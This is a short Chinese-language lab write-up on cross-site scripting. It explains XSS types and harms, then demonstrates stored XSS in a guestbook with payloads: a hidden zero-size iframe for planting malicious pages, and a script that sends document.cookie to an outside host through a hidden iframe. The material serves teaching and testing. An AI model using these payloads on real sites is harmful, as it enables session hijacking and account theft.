xss简介:
1)跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。
2)XSS工作原理
恶意web用户将代码植入到提供给其它用户使用的页面中,如果程序没有经过过滤或者过滤敏感字符不严密就直接输出或者写入数据库。合法用户在访问这些页面的时候,程序将数据库里面的信息输出,这些恶意代码就会被执行。
3)XSS漏洞的分类
1.本地利用漏洞,这种漏洞存在于页面中客户端脚本自身;
2.反射式漏洞,这种漏洞和类型A有些类似,不同的是Web客户端使用Server端脚本生成页面为用户提供数据时,如果未经验证的用户数据被包含在页面中而未经HTML实体编码,客户端代码便能够注入到动态页面中;
3.存储式漏洞,该类型是应用最为广泛而且有可能影响到Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄漏的可能,其中也包括了Web服务器的管理员。
4)XSS攻击的危害
1.盗取用户cookie;
2.盗取各类用户帐号,如机器登录帐号、用户网银帐号、各类管理员帐号;
3.控制企业数据,包括读取、篡改、添加、删除企业敏感数据的能力;
4.盗窃企业重要的具有商业价值的资料;
5.强制发送电子邮件;
6.网站挂马;
跨站脚本攻击基础
(这道题主要学习了网页种马的知识)
直接在留言版发现了存在的xss漏洞,这是存储型的xss
代码:<script>alert(1)</script>
二、网页种马
<iframe src="http://www.heetian.com"></iframe>
效果图如下
可以隐藏网页
<iframe src=http://www.baidu.com width="0" height="0"></iframe>
三、获取cookie
<script>document.write(document.cookie)</script>
如若要完成cookie的传输
代码如下
<script>document.write("<iframe width=0 height=0 src='http://10.1.1.78/cookie.asp?cookie="+document.cookie+"'></iframe>");</script>
要在网页端建立 接收的代码。